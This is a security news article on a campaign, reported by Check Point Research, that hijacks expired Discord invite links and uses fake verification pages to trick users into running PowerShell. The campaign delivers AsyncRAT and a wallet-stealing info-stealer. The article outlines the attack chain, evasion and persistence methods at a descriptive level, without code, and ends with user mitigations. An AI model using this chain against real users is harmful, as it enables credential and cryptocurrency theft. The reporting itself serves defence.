Cybercriminals Exploiting Expired Discord Invite Links to Deploy Multi-Stage Malware

Security researchers have uncovered a sophisticated malware campaign exploiting a little-known flaw in Discord’s invitation system, enabling cybercriminals to hijack expired or deleted invite links and redirect unsuspecting users to malicious servers.

This attack chain, discovered by Check Point Research, leverages trusted cloud services and advanced evasion techniques to deliver powerful malware, with a particular focus on stealing cryptocurrency assets.

Attackers monitor expired or deleted Discord invite links often shared by legitimate communities on forums or social media and re-register these codes as custom vanity links for their own malicious servers.

When users click on what they believe to be a safe, previously trusted invite, they are seamlessly redirected to a fake Discord server controlled by the attackers.

Upon joining, users typically encounter a “verify” channel featuring a bot that prompts them to complete a verification step.

This process redirects victims to a phishing website mimicking Discord’s interface, where they are tricked into running a malicious PowerShell command copied to their clipboard.

This social engineering method, known as “ClickFix,” avoids traditional red flags by not requiring users to download files directly.

Multi-Stage Infection Chain

The PowerShell script downloads a first-stage loader from GitHub, which in turn retrieves additional encrypted payloads from Bitbucket. These payloads include:

• AsyncRAT: An open-source remote access trojan granting attackers full control over the victim’s system, including keylogging, file management, and remote desktop access.
• Skuld Stealer: A customized info-stealer targeting browser credentials, Discord tokens, and, crucially, cryptocurrency wallets such as Exodus and Atomic. The malware injects malicious code into wallet applications, exfiltrating seed phrases and passwords via Discord webhooks.

The campaign also employs a ChromeKatz-based module to bypass Chrome’s Application-Bound Encryption (ABE), extracting browser cookies directly from memory even on the latest versions of Chrome, Edge, and Brave.

To avoid detection, the malware uses several advanced evasion techniques:

• Cloud-Based Payload Delivery: All malicious files are hosted on trusted platforms like GitHub, Bitbucket, and Pastebin, blending in with normal traffic.
• Time-Based Evasion: Execution is delayed using scheduled tasks, ensuring that malicious behavior only appears after automated sandbox analysis has ended.
• Dynamic Infrastructure: Attackers frequently update payload URLs and binaries, maintaining low antivirus detection rates and resilience against takedowns.

Persistence is achieved by creating scheduled tasks that regularly re-download and execute the malware, making removal difficult and enabling ongoing remote access by the attackers, reads the report.

Download statistics from Bitbucket suggest the campaign has reached over 1,300 potential victims, with infections observed across the United States, Europe, and Asia.

The focus on cryptocurrency wallets and browser credentials points to financially motivated threat actors.

Discord has acted to disable the malicious verification bot involved in the campaign, disrupting the current infection chain.

However, the underlying flaw in invite link management remains exploitable, and attackers could easily adapt their methods to continue targeting users.

Mitigations

• Avoid clicking on old or expired Discord invite links, especially those found on public forums or social media.
• Only use permanent invite links with uppercase letters, which are more resistant to hijacking.
• Be wary of any Discord server that requires external “verification” steps or prompts you to run commands on your computer.
• Keep security software updated and regularly scan for malware.

This campaign underscores the importance of vigilance, even on trusted platforms, and highlights the evolving tactics of cybercriminals targeting the booming crypto sector